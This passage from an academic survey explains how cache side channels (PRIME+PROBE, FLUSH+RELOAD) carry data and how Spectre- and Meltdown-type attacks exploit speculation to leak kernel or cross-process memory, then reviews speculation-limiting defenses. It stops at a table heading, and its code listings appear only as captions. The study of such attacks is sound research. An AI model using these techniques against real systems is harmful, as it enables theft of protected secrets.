To obtain data, a communication channel is built using one exploited component of the cache hierarchy. The communication channel has a receiver and a sender. In general, the communication channel is built using three steps: ① the receiver sets up the state, ② the sender may or may not modify the previous state, and ③ the receiver checks the state to infer if and what data was transmitted (Figure 7). The receiver, through program analysis, knows which addresses will be accessed by the sender. In order to check if those memory accesses have been performed, the receiver will setup a specific state in the cache hierarchy ①. If the sender accessed the expected addresses, the state setup by the receiver will change ②. The receiver can infer what data was transmitted from the modification of the previously setup state ③. The modification of the state is identified by the high/low latency of certain memory accesses.
Fig. 7.
Fig. 7. Generic communication channel in the cache hierarchy.
Listing 2.
Listing 2. Example of a sender. DATA is transmitted through the cache hierarchy. The size of uint_t8 is 1 byte.
Building communication channels in the cache hierarchy is an extensively researched topic [1, 20, 26, 45, 46, 55, 69, 107, 109, 119, 174, 179, 180]. Herein, three main categories are defined for building communication channels through the cache hierarchy: eviction-based, replacement-policy-based, and coherence-based. Each category denotes which feature of the cache hierarchical system is being exploited. Eviction-Based channels exploit set sharing between an attacker and a victim. The attacker occupies every way in a set forcing the victim to evict one of its addresses. Replacement-Policy-Based channels exploit the replacement policy state in a set. This is an optimization of the previous channel by controlling the way that is going to be evicted, which avoids the attacker having to probe every way in the set. Coherence-based channels, do not rely on set sharing, instead, they exploit the coherence state of shared memory between the victim and the attacker. There are other channels available in the cache hierarchy that do not fit into these categories [31, 111, 130].
Each of the next sections describe the basic methodology to deploy a type of communication channel. For the examples herein, both the receiver and the sender share a byte-addressable, 4-way set-associative 128 KiB cache with 64 B lines (the hash used for a 32-bit address and the cache parameters are in Figure 8). An example C code is presented for each type of receiver. The sender is common for all channel types, as presented in Listing 2: it transmits the 128 bytes stored in the DATA array by performing secret-dependent memory accesses through array A. Therefore, the secret-dependent memory accesses will program the cache hierarchy in a unique way. A receiver with knowledge of this, is able to extract the contents of DATA.
Fig. 8.
Fig. 8. Hash for a 4-way 128 KiB set-associative cache with 64B lines and cache parameters.

4.1 Eviction-Based Channels

Eviction-Based channels are constructed by a receiver fully occupying a cache set. The information is encoded when the victim evicts an attacker address from the cache set. On a sender access, one of the receiver’s cache lines will be evicted [55, 107, 109, 176]. The receiver probes each address of the set to find if any data was transmitted (PRIME+PROBE). The receiver can also exploit the inclusive policy in use in the hierarchy and force evictions of cache lines in lower-level caches from higher-level caches [34, 68, 90, 175, 176]. As it was stated before (Section 2.2), evicting a cache line from an inclusive cache will evict the same cache line, if it is present, from any lower-level cache. On the other hand, evicting a cache line from a non-inclusive non-exclusive or exclusive cache will not evict the same cache line from any lower-level cache.
The sender in Listing 2 exhibits the properties of an eviction-based transmission channel. The contents of DATA form a unique memory pointer through A. As a result, each access will occupy a different cache set, i.e., the data transmitted is encoded in the occupied set number in the cache. Consider the case where the first byte stored in DATA is 0xa. For i = 0, the pointer A to be loaded in line 3 of the sender is constructed as \(\texttt {A} + (\texttt {DATA}[0] \lt \lt \texttt {offset_bits}) \times \texttt {sizeof(uint8_t)}\). The sizeof of a uint8_t is 1 byte, offset_bits is 6 bits, and DATA[0] holds 0xa, thus the pointer is \(\texttt {A} + (\texttt {0xa} \lt \lt 6)\). From the hash function in Figure 8, observe that the contents of DATA are being shifted into the index part of the hash, dictating which set of the cache will be occupied. A receiver can detect which sets A occupies by building an eviction set, i.e., finding a group of addresses which fully occupy the same set and, consequently, are the full list of eviction candidates.
Figure 9 shows an example of one eviction-based channel. The receiver fills a cache set with its addresses ①. The sender accesses the same set and is forced to evict one of the receiver addresses ②. The receiver will check if its addresses are still in cache. When loading each address, it will find that \(\text{A1}_R\) was evicted due to the high load latency ③. Listing 3 shows C code for the receiver to capture information transmitted by the sender using the described channel. The offset of buf needs to be carefully selected as the transmitted data will be encoded in the number of the occupied set. To create a set collision, j shifts 15 bits (index_bits + offset_bits) such that the set is the same but the tag is different. After filling the set, the receiver will check if data was transmitted by checking the timing of accessing the addresses that were used to fill the set. It is important to note that the attacker cannot control every memory access performed by the victim. There may be other memory accesses, either by the victim, the attacker, or any other process, that will evict data from the attacker’s eviction set. To avoid false positives, the attacker will have to execute Listing 3 multiple times such that the attacker’s analysis is statistically relevant [48].
Fig. 9.
Fig. 9. Eviction-Based: PRIME+PROBE. The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_R\) denotes addresses belonging to the receiver, and \(\text{A}_S\) denote addresses belonging to the sender.
Listing 3.
Listing 3. An example receiver for an eviction-based communication channel.

4.2 Replacement-Policy-Based Channels

Replacement-Policy-Based channels encode the information to be transmitted in the replacement policy of a cache set, but are similar to eviction-based channels. The receiver will build an eviction set. By controlling all addresses, the receiver can access its addresses in a specific pattern so that the replacement policy will evict a specific address when the sender accesses the set. To check what data was transmitted by the sender, the receiver will force an eviction. If the expected line was evicted, then the sender did not transmit data. However, if some other line was evicted instead then the sender did transmit data [20, 119, 174].
For this transmission channel consider that the buffer A is shared between the sender and the receiver. This can occur when the attacker and the victim are sharing the same dynamic library, e.g., libssl for a cryptographic operation. Figure 10 shows an example of a replacement-policy communication channel. The receiver accesses a cache set such that the replacement policy is programmed to select the address \(\text{A1}_{S + R}\) for eviction ①. The sender accesses the same address changing in the process the eviction address, to \(\text{A3}_R\) ②. The receiver forces an eviction, expecting \(\text{A1}_{S + R}\) to be evicted. However, \(\text{A3}_R\) was evicted in ③. The receiver can detect which address was evicted by re-accessing the addresses originally in the set, and detect if the sender transmitted data. Listing 4 shows C code for the receiver to capture information transmitted by the sender using the described channel. It is noted that the receiver code is similar to the eviction-based channel with the added steps to program the replacement policy. Similarly, the attacker will have to execute this listing multiple times such that the results are statistically relevant.
Fig. 10.
Fig. 10. Replacement-Policy-Based. The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_R\) denote addresses belonging to the receiver, \(\text{A}_S\) denote addresses belonging to the sender, and \(\text{A}_{S + R}\) denotes addresses that belong to the sender and receiver.
Listing 4.
Listing 4. Example of a receiver in a replacement-policy-based communication channel.

4.3 Coherence-Based Channels

Coherence-Based channels depend on modifications to the global coherence state. Furthermore, they are broken into two types, depending on the ability to use the flush instruction. The flush instruction allows a thread to remove its addresses from the cache hierarchy [10, 12, 65]. However, not all privilege levels have access to such an instruction. For example, x86-based systems allow userland processes to execute the instruction [10, 65] but ARM-based systems do not [12, 44]. This section focuses on communication channels built with flush instructions. However, there is research which is able to build coherence-based channels without using a flush instruction [44, 130].
Flush-Based channels encode the transmitted information by placing a memory address in the cache hierarchy, and rely on the sender and receiver sharing some memory, e.g., if the victim and attacker are sharing the same dynamic library. One method to transmit data is for the receiver to flush the expected sender’s transmission from the hierarchy and then re-access it again at a later time (FLUSH+RELOAD) [179]. The second access will either be very fast, because the sender re-accessed the data and placed it in the cache hierarchy, or slower if the data is still in external memory. The presence of the flushed address in the hierarchy indicates that data was transmitted, and the loaded address indicates what data was transmitted.
Another option for the receiver is to continuously flush the data from memory (FLUSH+FLUSH) [46]. Issuing a flush triggers invalidation requests in the coherence network. If there is at least one copy of the cache line in the hierarchy, all invalidation requests will have to complete before the flush instruction completes. Therefore, the second flush will be slow if the data is in the cache hierarchy, and fast if it is not.
Once again, consider that the buffer A is shared between the receiver and sender. Figure 11 shows an example of a FLUSH+RELOAD communication channel. The receiver flushes a shared address from the cache hierarchy ①. The sender accesses the same address again, and places it in the hierarchy ②. The receiver loads the address. A fast access implies that the sender transmit data. Otherwise, a slow access implies that the sender did not transmits data ③. Listing 5 shows C code for the receiver to capture information transmitted by the sender using the described channel. Unlike the eviction-based channel, the receiver does not have to find address collisions for the same set or share a cache level with the sender. Furthermore, if it is known that the victim is the only other process sharing A with the attacker, then the attacker only has to execute Listing 5 once.
Fig. 11.
Fig. 11. Flush-Based: FLUSH+RELOAD.The examples show the steps taken by the receiver and sender on each phase: setup state, modify state, and check state. \(\text{A}_{S + R}\) denotes addresses that belong to the sender and receiver, and X is a do not care.
Listing 5.
Listing 5. Example of a receiver in a flush-based communication channel (FLUSH+RELOAD).

5 Mounting Transient-Execution Attacks

Generally, Transient-Execution Attacks (TEA) can be broken into three steps (1) create a transient window of operation, (2) accessing data transiently (Section 3) and (3) encoding data in the micro-architectural state (Section 4). Herein, a transient window is defined as the time the commit stage is stalled waiting for an instruction to complete. The transient window is limited by the size of the ROB (larger than 200 operations in modern OoO architectures [36, 39]) and the latency of the instruction which is stalling the commit stage, e.g., instruction waiting for memory, or the verification latency of the instruction which caused a mis-speculation. To create a transient window, one of these techniques can be used. In the second step, the goal is to use the time until the closure of the transient window to access the desired buffer or memory location. Then in the third step, the data is transmitted from the transient domain into the micro-architectural state. The communication channel used can be any from Section 4, as long as the requirements for each communication channel are met (shared memory, invalidation cache coherence, inclusive caches, flush instruction, instruction can be executed transiently, etc). This section provides a detailed description of how TEAs are constructed using the previously introduced concepts.
To describe these attacks, it is assumed that the attacker and the victim are two different processes or threads, running in the same system. They are both running on the same physical core either simultaneously, through Simultaneous Multi-Threading (SMT), or through time-sharing, with the OS/hypervisor switching the context between the victim and the attacker. Moreover, the attacker will analyze the program of the victim looking for the sender code from one of the communication channels previously described. The state-of-the-art defines two types of attacks depending on which micro-architectural state is being manipulated during the transient window [21, 23]: value prediction (Spectre-type) or exception handling (Meltdown-type). An attacker that deploys a Spectre-type attack trains a speculation mechanism such that, when the victim runs, part of its execution will be through an illegal data-flow path until the misprediction is detected and rolled-back. Hence, the victim uses the micro-architectural state as the attacker designed, accesses the data requested, and encodes the information in a micro-architectural state. An attacker that deploys a Meltdown-type attack triggers an exception in its data-flow path, such that the instruction which triggered the exception is able to read data from micro-architectural buffers, that should not be accessible, and the data is forwarded to other dependent instructions. The attacker, itself, during the transient window, encodes the data into the micro-architectural state for later retrieval.

5.1 Original Spectre-PHT/-BTB and Meltdown-US Attacks

The original Spectre-Type [81] and Meltdown-Type [87] attacks were the first attacks which exploited the timing window of an unverified micro-architectural state to obtain data from a victim and transmit it to an attacker. They are referred to as Spectre-BTB, Spectre-PHT, and Meltdown-US [21].
The original Spectre-BTB/-PHT attacks have two key findings. First, the BTB/PHT is shared between all threads running on the same physical core. Therefore, an attacker with knowledge of the architecture of the BTB/PHT can train it. When the victim runs in the same core, it will perform a mis-speculation in a jump which will execute a sequence of instructions that is not correct [81]. Second, the OoO nature of the core’s backend will always execute instructions regardless of misprediction or not [80, 81]. Listing 6 shows how array checks can be bypassed through misprediction using an attacker controlled x. If x is larger or equal to buf1_size, the buf1 and buf2 loads will not update the architectural state. However, a core that mis-speculates over the control instruction will place the loads in the core’s L1 cache and the coherence state of the cache lines will change. Note that, even if the mis-speculation is detected while both loads are mid-flight, the cache lines will still be allocated because memory instructions that have been dispatched to the cache hierarchy cannot be canceled mid-flight [80]. A victim with this profile can be exploited to transmit the whole contents of its memory space through the cache hierarchy. In this example, data is transmitted using the address generated by buf2.
Consider an example where the victim is an OS kernel and the attacker is a userland process. The attacker has examined the kernel code and found a vulnerable system call that contains the code in Listing 6. In order to exploit the jump in the system call, the attacker will execute a jump of its own that uses the same target and prediction slot, in the PHT, as the exploitable jump in the system call. This is the same problem as the eviction set creation problem from the communication channel in Section 4. With this knowledge, the attacker will execute its jump multiple times, to program the PHT, such that the system called jump performs the same prediction. Note that, the jump executed by the attacker must have the opposite result of the victim’s jump. In this instance, the attacker’s jump will always be not-taken whereas the victim’s jump, with an x greater than \(buf1\_size\), will always be mis-predicted as not-taken. After the attacker performs all of these steps, it will cede execution to the victim by calling the vulnerable system call. Figure 12 shows the micro-architectural events when Listing 6 is executed. For simplicity, in all future examples, the step of sending data through the communication channel is bundled as a single comm_channel instruction. Assume the load of buf1_size misses the cache hierarchy and, thus, opens a large speculative window in the micro-architecture ① (Figure 12(a)). The next instruction in the stream is a blt, for the if statement, which the fetch unit predicts to be a not-taken jump to the communication channel (② and ③ in Figure 12(a)). In this state, the commit stage is stalled because of the missing load (④ and ⑤ in Figure 12(b)). Therefore, the blt is not dispatched since it depends on the result of the load. However, the communication channel does not depend on this load and can execute. Thus, the communication channel is dispatched to the functional unit and updates the state of the data cache with the secret data (⑥ and ⑦ in Figure 12(b)).
Fig. 12.
Fig. 12. Spectre-PHT micro-architectural example using an OoO double-issue micro-architecture. D$ is the data cache and the X in it denotes a do not care. n is the number of bytes of the current instruction.
Listing 6.
Listing 6. Spectre-PHT bounds check bypass using an attacker controlled x.
Listing 7.
Listing 7. Meltdown-US using an attacker controlled x.
The Meltdown-US attack showed that, during transient execution, memory accesses are still able to read the contents of a memory address when the executing thread does not have the correct set of permissions, i.e., when the memory access triggers an exception [87]. This occurs in micro-architectures where the result of an instruction, which triggered an exception, can be forwarded to other dependent instructions and the result is not zeroed (Intel, ARM, and IBM [80]). Similarly to Spectre-BTB/-PHT, if the memory operation is dispatched to the cache hierarchy prior to completing the verification, the cache line will be fetched into the L1 cache. The contents of the memory operation are then forwarded to other dependent instructions which can transmit data to a receiver (Listing 7). Note that, Meltdown-US requires a valid physical address translation of the target address, i.e., the accessed address must be mapped in the attacker’s virtual memory space.
Once again, consider that the victim is the kernel of an OS and the attacker is a userland process. Moreover, consider that the kernel is mapped to every userland process in order to speedup system calls. Through other means, the attacker has figured out a kernel address within its own memory map. Figure 13 shows a micro-architectural example of a Meltdown-US attack being performed by Listing 7. Assume a load misses the cache-hierarchy ① (Figure 13(a)), which opens a large transient window, while a load to the kernel (lw kernel_addr) and the communication channel (comm_channel) wait to be issued. As a result, the commit stages stalls waiting for the load that missed the cache hierarchy ② (Figure 13(b)). Since the micro-architecture has a second issue port, the load to the kernel address is issued to the functional unit and it hits in the cache ③. While executing the load to the kernel address an exception is triggered because the current process does not have the privilege to access that address ③. However, the exception is not triggered immediately because the previous load missed the cache hierarchy, which caused a stall in the commit stage ④ (Figure 13(c)). Furthermore, the result of the load to the kernel address is forwarded to a dependent instruction. In this instance, the communication channel ⑤. The final state of the data cache shows the kernel data encoded.
Fig. 13.
Fig. 13. Meltdown-US micro-architectural example using an OoO double-issue micro-architecture. D$ is the data cache and the X in it denotes a do not care.
TEAs require the attacker and the victim to share the same micro-architectural resources. However, there is an important difference between Spectre-BTB/-PHT and Meltdown-US. Spectre-BTB/-PHT need to program a specific state and then let the victim execute in the same physical core, i.e., the micro-architectural resource being shared is the branch prediction unit and cache hierarchy. On the other hand, Meltdown-US is even more dangerous as it can be executed by an attacker that is not sharing the same physical core with the victim. In fact, the victim only needs to be loaded into memory [87], i.e., the victim and the attacker share the same memory map, translation entries, and cache hierarchy. The core will pull any data into the cache hierarchy, regardless of permissions, before the exception is triggered.

5.2 Advances in Spectre- and Meltdown-Type Attacks

Further research on how Spectre- and Meltdown-type attacks operate showed there are other components in the micro-architecture that can be exploited. Spectre attacks have gone on to exploit the RSB [83, 93, 170], the memory dependence prediction unit [80, 159], and the global PHT [15]. Meltdown attacks have expanded to exploit other micro-architectural buffer forwardings when an instruction triggers an exception. Recent attacks have shown that data can be forwarded from invalid MSHRs [98, 135, 160, 161], invalid load ports (load ports are pipeline registers that hold data between the L1 cache and the core) [135], invalid store buffer entries [22, 134], and addresses with the present bit set to 0 in the TLB entries [158, 168]. Table 2 shows a summary of the main TEAs published in the literature. The table classifies the attacks by type (Meltdown or Spectre), if it can be executed from a remote core (Remote), describes which micro-architectural interaction is being exploited, and what method is used to deploy the attack. The names for each attack follow the nomenclature introduced by Canella et. al in [21]. Each name is defined by the construction <TYPE>-<EXPLOITED_COMPONENT>.
Table 2.
NameTypeRemoteMicro-Architectural InteractionMethod
Spectre-PHT Spectre-BTB (Original Spectre) [15, 81]SpectreNBTB and PHT SharingTrain the victim’s BTB/PHT in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Meltdown-US (Original Meltdown) [87]MeltdownYForward result of instruction which generated an exception to dependent instructions.Access a memory address for which the current thread does not have permissions. Even though the thread does not have permission, the data is still pulled into the cache hierarchy and forwarded to dependent instructions before triggering the exception.
Spectre-RSB[83, 93, 170]SpectreNRSB SharingTrain the victim’s RSB in order to trick its instruction stream into executing an instruction sequence which reveals secure data.
Spectre-STL[54]SpectreNMemory Dependence Unit SharingTrain the memory dependence prediction unit to allow certain loads to execute before a store to the same address. The load will then forward its result to other dependent instructions. Useful if the targeted code is trying to zero secret data.
Meltdown-P (Foreshadow) [158, 168]MeltdownNPull any data from L1 cache. TLB sharing.Any valid address translation in the TLB, regardless if it throws an exception due to permissions or presence, can pull data from the L1 cache into dependent instructions. However, it does not allocate an MSHR on a miss, i.e., data cannot be fetched from higher cache levels.
Meltdown-MCA Meltdown-GP (ZombieLoad [135] RIDL [160] CacheOut [161] Fallout [22])MeltdownNRead data from invalid buffersAn exception is triggered when a virtual to physical translation fails due to the PTE not having the present bit set. Despite the exception in the instruction, some micro-architectures try to speculate over the possible address translation using the LSB of the virtual address (assuming 4KiB pages, the 12 LSB). The load with the exception can pull data from MSHR, the store buffer (committed stores), the store queue (uncommitted stores), and the load ports.
Load Value Injection[159]Spectre/MeltdownNMemory Dependence Unit SharingTrain the victim’s address disambiguation unit such that it loads a value from an attacker chosen address under an exception.
Table 2. A Summary of TEAs Showing Which Type of Attack They Belong to, which Micro-Architectural Interaction is Being used, if the Attack Can be Executed from a Remote Core, and what is the Method to Exploit it
A difficulty in deploying TEAs is the size of the timing window to retrieve data and transmit it. Both must complete for the attack to be successful. There are two limiting factors to the size of the transient window: the verification latency of the misprediction, and the number of instructions that can be executed prior to the conclusion of the verification [163]. In commodity micro-architectures, the highest latency path is a memory access to an address that is not cached and when the virtual address translation is not in the TLB. This scenario has such a high latency that the attacker is only limited by the size of the ROB, assuming no other memory access is in the same circumstances.
The same idea can be applied to Meltdown, the instruction which triggers an exception can be behind another long latency instruction. A difficulty specific to Meltdown is how to handle exceptions so that the attacker can continue executing (triggering an exception results in a process termination). A possible solution is to spawn a child process which will run the Meltdown exploit. The child process will terminate when the instruction which triggered the exception is committed. The parent process can then read the micro-architectural state left by the child. This solution has the shortcoming of performing context switches between the parent and the child, where a context switch may destroy the micro-architectural state left by the child. A better solution would be to handle the SEGFAULT directly [87]. In this case, there would be no context switching between two processes. However, the OS would still have to be called to defer the handling of the exception to the attacker’s signal handler. An even better solution, if available, is to use transactional memory [65]. Within a transactional block, any instruction which triggers an exception will cause the architectural effects of the entire block to not take place, the exception is not delivered to the OS, and normal execution of the program resumes [65, 87, 142]. The OS is not involved, thus the micro-architectural state remains the same [158]. If transactional memory is not available in the platform, the attacker can use Spectre on top of Meltdown. The instruction which will cause the exception is hiding behind an always mispredicted instruction. In this instance, there is no exception to suppress but the micro-architectural effects are the same [158]. The latter technique was used in an attack in micro-architectures which use pointer authentication [123]. Pointer authentication is used to protect privileged memory from being tampered with. Usually, the hash of the pointer is stored next to the pointer in the same stack frame [123]. In the mis-speculation window, the attacker develops a bruteforce pointer authentication oracle to extract the correct hash for the pointer. If the guess is correct, the micro-architecture generates a valid pointer and loading the pointer will result in a communication channel creation. If the guess is incorrect, the pointer is not created and the authentication instruction triggers an exception. By bruteforcing the hash behind a mis-speculation window, the exception, which would cause a program termination, is never triggered.

6 State-of-the-Art Defenses

There are multiple approaches in the state-of-the-art on how to defend against TEAs. Mainly, the literature focuses on the second and third steps of a TEA. The taxonomy adopted herein splits defenses into two categories: defenses that limit or prohibit speculation (the second step in setting up a TEA), and defenses that impede the formation of the communication channel (the final step in setting up a TEA).

6.1 Limited-Speculation Defenses

The key concept behind Limited-Speculation Defenses is that speculation is fundamentally insecure. Therefore, the defenses focus on controlling the micro-architectural state resulting from speculation. Table 3 shows seven techniques and is organized into six categories: whether the technique is a hardware and/or software implementation (HW/SW); what is the defense method (Method); which micro-architectural components are protected by the technique (Protected Components); what the drawbacks of the technique are (Drawbacks); what the maximum performance penalty is (Max. Performance Penalty); and if the technique is backward compatible (BC). Backward compatibility is defined using two variants: one for software and one for hardware. Software BC (SW BC) is defined as the ability to take a previously compiled binary, to the same architecture, and have it execute with the security guarantees provided by the new micro-architecture. Hardware BC (HW BC) is defined as the ability to backport the modifications performed by the technique to older micro-architectures (e.g., a microcode update that changes the behavior of certain instructions [62]). The maximum performance penalty metric used is the maximum reported performance penalty by any of the cited papers for each category and is only valid for the experimental methodology used. To facilitate consultation, the performance penalty is provided with the accompanying citation.
Table 3.
TechniqueHW/SWMethodProtected ComponentsDrawbacksMax. Performance PenaltySW BCHW BC
Partition Speculation Components [10, 11, 12, 13, 65]HWAdd PIDs per speculation entryBTB, PHT, RAS, Memory DependencePartition fighting may lead to lower performanceN/AYN
Clear Micro-Architectural State [150, 151, 171]HW/SWFlush all shared micro-architectural buffers on context switchAllContext switches are slower in order to clear the micro-architectural state2% [171]YN
Trap Speculation [3, 77, 132, 177, 182]HWSpeculative instructions are only allowed to execute if they do not lead to a communication channelAllAccesses to methods which lead to a communication channel need to operate in a different micro-architectural domain21% [177]YN
Speculative State defined in the ISA[5, 12, 65, 92, 167]HW/SWAdd instructions to the ISA which limit speculationAllA conservative use of these instructions leads to performance loss [11].125% [167]NY/N
Retpoline [5, 63, 156]SWTrap the indirect jump predictor in a prediction loopRAS-10% [25]N-
Runtime Code Injection [148]HWDetect TEAs gadgets at runtime and inject code which nullifies their effectAllRuntime gadget detection and code injection may lead to lower performance21% [148]YN
Recompilation[5, 8, 9, 11, 56, 60, 74, 108, 120]SWProhibit compilation of transient gadgets. Generate “secure” code sequences.AllRequires all binaries to be recompiled. New code sequences may not be as performant.N/AN-
Table 3. State-of-the-Art Defenses Which Limit Speculation
BC = Backward Compatibility.
Partition Speculation Components. This is the method currently employed in some current micro-architectures. Intel and ARM use some form of partitioning to limit a process from influencing the speculation results of another process [13, 15]. Each entry in the speculative component has a unique application-specific ID. If there is no full ID match in the entry, the core does not speculate [13]. Its limiting factor is the resource fighting between running processes in the same core. The partitioning components scheme is secure if and only if all shared speculative components are partitioned. It has been shown that one of the latest Intel micro-architectures (Ice Lake), despite having in-silicon defenses against TEAs, is vulnerable to Spectre-type attacks because one shared speculation component, the PHT, was not partitioned [15]. Intel, ARM, and AMD do not provide any benchmarking for this type of defense. Therefore, the performance penalty is unknown. This technique is backward compatible in regards to software, as any software will immediately take advantage of the modifications performed. However, these kinds of modifications cannot be applied directly to older micro-architectures. Therefore, they fail hardware backward compatibility.
Clear Micro-Architectural State. On a context switch, the core will flush all shared micro-architectural buffers. The extent of the flushing depends on the security requirements of the system and/or software. There are proposals to handle the flushing in hardware [171], while others use software [150, 151]. Intel has modified the VERW instruction to overwrite specific micro-architectural components [62, 151]. Hardware solutions are always advantageous to the programmer as they do not have to reason about the micro-architectural state. Software solutions rely on the programmer to execute the correct set of instructions to clear the necessary state. However, hardware solutions are conservative in clearing the micro-architectural state regardless of the security requirements of the software running. Therefore, a software solution can yield better performance in cases where the software’s security model is known. In both cases, flushing part or the whole micro-architectural state adds to the performance penalty of context switches. Similarly to the previous category and for the same reasons, SW BC is maintained and HW BC is voided.
Trap Speculation. The trap speculation technique limits or blocks the results of speculative instructions to a communication channel. Most proposals focus on blocking the cache hierarchy communication channel. As such, they add a per thread private L0 cache to capture the effects of speculative instructions which operate over the cache hierarchy [3, 177]. If the speculation is correct, the effects of the speculative instructions are applied to the cache hierarchy. Otherwise, they are ignored. One proposal stalls or predicts speculative memory accesses until they are verified [133]. Other proposals allow speculation to alter the cache hierarchy but will “undo” the state on a mis-speculation [77, 132]. Another proposal generalized the problem of transmitting data of speculative instructions to a communication channel in any micro-architecture [182]. Recent research showed that these methods can still be attacked [16, 86]. For methods which trap speculation in an L0 cache, the order in which speculative memory accesses, and subsequent memory accesses, are performed cause enough of a timing difference to build a communication channel [16]. For the methods which rollback the mispeculated cache state, the communication channel is built from the timing difference associated with the size of the rollback state [86]. The hardware modifications required by this technique implies that HW BC is voided. However, SW BC is maintained.
Speculative State defined in the ISA. The micro-architectural state is partially defined in the architectural state. This approach has been adopted by Intel [59, 61], AMD [5, 7], and ARM [11, 12]. New instructions are added to the ISA such that the order of operations in relation to a speculative instruction is always guaranteed. Similarly to memory ordering instructions (fences), speculation ordering instructions guarantee that instructions which follow a speculative instruction are not allowed to execute until the speculation has been verified. Intel and AMD provide instructions to limit jump and memory dependence speculation [5, 7, 59, 61]. ARM goes beyond and provides instructions, not only to limit jump and memory dependence speculation, but also to limit any speculation [11, 12]. Old programs will have to be recompiled to take advantage of these new instructions. This voids SW BC. HW BC can be maintained if the older platforms allow microcode updates which introduce new instructions or add side-effects to existing instructions [62]. Another type of protection domain would be in using special hardware, within the backend of the core, that is able to track and stop data forwarding to instructions with measurable side-effects [92, 167]. The previous technique guarantees security in SW BC through extensive hardware modifications. As a result, they can not be backported to older micro-architectures, which means they are not HW BC. Although merging the micro-architectural and the architectural state guarantees speculation behavior to the programmer, it limits the design freedom provided to micro-architecture implementations. Furthermore, the usage of these instructions requires a deep understanding of the micro-architecture to not only guarantee security but to also maintain high performance. Much like memory ordering instructions, a conservative use of speculation limiting instructions will lead to performance loss [11].
Retpoline. Retpoline is a technique which sets up the RAS with a prediction loop. The prediction loop will lock the speculation state into fetching and executing the same safe instruction sequence until the speculation is verified [5, 63, 156]. As this technique relies on precise code in certain function calls, the backward compatibility requirement is not met. Despite limiting the RAS, there is still a vulnerable timing window to perform a Spectre attack while setting up the required prediction loop [97]. Moreover, recent micro-architectures that have in-silicon defenses against RAS TEAs have been shown to still be vulnerable against Spectre [170]. Since Retpoline is a software technique, only SW BC is maintained and considered.
Runtime Code Injection. The decode unit inspects the sequence of outputted micro-code. If the generated micro-code matches that of a TEA, the decoder will inject a specific micro-code sequence that will nullify the effects of the possible mispeculated instructions to a communication channel. These code sequences can be the ones from the previously described techniques, such as: instructions to clear the micro-architectural state, instructions to limit speculation, and/or retpoline. Using the cache hierarchy as a communication channel, the micro-code sequencer injects fence instructions such that some memory accesses are strictly ordered behind a speculative instruction [148]. Regardless of the detection system used, this technique will always be susceptible to new exploits that remain undetected. Furthermore, the detection mechanism and code injection may lead to performance loss in certain workloads [148]. To avoid incurring the performance penalty for every binary, the software environment could mark binaries as safe or unsafe depending on the presence of TEA gadgets or communication channels [56, 74, 108, 120]. Moreover, to further improve performance, the software environment can tag specific regions of interest to defend against TEAs. As for BC, and since this code injection method needs to be the in the decoder stage of the micro-architecture’s pipeline, SW BC is maintained and HW BC is not.
Recompilation. Equivalent to the Runtime Code Injection technique. The compiler detects vulnerable code sequences and replaces them with safe variants [56, 74, 108, 120]. Comparing the recompilation technique with the runtime code injection technique, there is no extra performance penalty for detection and mitigation during runtime. The performance cost of recompilation is paid at compile-time. The disadvantage, in comparison to the runtime alternative, is that the source code needs to be available to perform the recompilation, while the runtime alternative can execute any binary. Hence, recompilation is not SW BC. Both alternatives suffer from the same drawbacks.
A common theme in all techniques that look to limit speculation is that they all impact performance somehow. Moreover, some techniques have outstanding security vulnerabilities. All techniques try to define what the insecure speculative state is and how it should be limited. Except for trap speculation, they consider the speculative state as any computation which stems from any speculation. As a result, they limit the global speculative state. However, the Trap Speculation technique reduces the insecure speculative state to only speculative instructions which leads to communication channels. Recall that a TEA is only successful if the attacker is able to recover data from the victim, and not if there is some manipulated speculative state.
Discussion. Providing security by limiting speculation is a paradigm shift on how micro-architectures are designed and implemented. Through this methodology, the speculative state needs to be precisely defined for all micro-architectural states. This analysis is akin to the allowed memory consistency model [106]. Using formal analysis of speculative states, one can design tools which detect possible insecure states [24, 47, 98, 102, 108, 117, 154]. There is little research done on how a micro-architectural implementation, through a Hardware Description Language (HDL), can be fixed if an illegal speculative state is found [40, 57, 105, 157]. This is a difficult problem to correctly solve as the setup and clearing of a speculative state is particular to each micro-architecture implementation, not to the architectural model (even if it partially defines the speculative state). An unexplored avenue for micro-architectural programming is the usage of hint instructions, behind and not behind speculative instructions, in attacks. Hint instructions are architectural no-operations. However, they directly program the micro-architectural state. Most ISAs provide instructions to hint some prediction mechanism into a known state [10, 65, 126]. These hints commonly affect jump prediction and memory dependence prediction units. Although attacks have been found for particular speculation mechanisms, it does not mean novel speculative components are immune to them. A survey of proposed speculative mechanisms showed that attacks can still be mounted and may provide unlimited access to certain resources in the system [162]. The proposed speculation mechanisms range from value prediction (predict results of operations) to data compression inside and outside the core. It has already been shown that data compression in the cache can be exploited to infer what data is stored in a cache line depending on the level of compression [155]. Value prediction allows an attacker to inject data into the victim’s operations if the predictor is not protected [141].
Summary. Limiting the speculative state is always bound to be a complex task as the current paradigm to design and implement micro-architectures does not define speculative state. Partially defining the micro-architectural state in the ISA is a solution that moves the responsibility of the problem to the programmer. Historically, shifting the responsibilities of the micro-architecture to the programmer have not been advantageous. The design of a micro-architecture is usually around facilitating the programmer’s work. Micro-Architectures employ OoO execution because an OoO execution engine is able to obtain good performance from non-performant code. Cache hierarchies are employed because programs implicitly exhibit locality and temporality in their memory accesses. An example where micro-architectures were designed around a programmer’s ability to write correct and performant code would be in the memory consistency models [106]. Weaker memory models can provide better performance than strong memory models. However, they rely on the programmer having the knowledge to correctly insert memory ordering instructions to get the expected results without sacrificing performance. A recent trend in modern computer architectures sees a preference toward stronger memory models due to the ease of programming. A recent industry example is the stronger ARMv8 memory model. Up until ARMv7, ARM employed a weak memory model which was hard to formally define due to the numerous possible outcomes in many litmus tests [118]. The recent RISC-V memory model, which is still being defined, also shows features that would previously be only in strong memory models [126]. Similarly to memory consistency models, the micro-architectural states allowed after a speculative event can also be defined using strong and weak qualifiers. A weak speculation model allows any state to result from any speculation. A strong speculation model allows a finite number of states to result from a set of known speculative events.

6.2 Limited-Communication-Channel Defenses

Unlike speculation-limited defenses, limited-communication-channel defenses allow cores to speculate. The observation is that speculation is not inherently insecure. However, the insecurity comes from the attacker being able to build a communication channel with the victim. Table 4 shows four techniques for preventing the attacker from communicating with the victim using the cache hierarchy as a communication channel. Table 4 uses the same categories as the previous section: Method, Protected Components, Drawbacks, Maximum Performance Penalty, and backward compatibility (software and hardware).
Table 4.
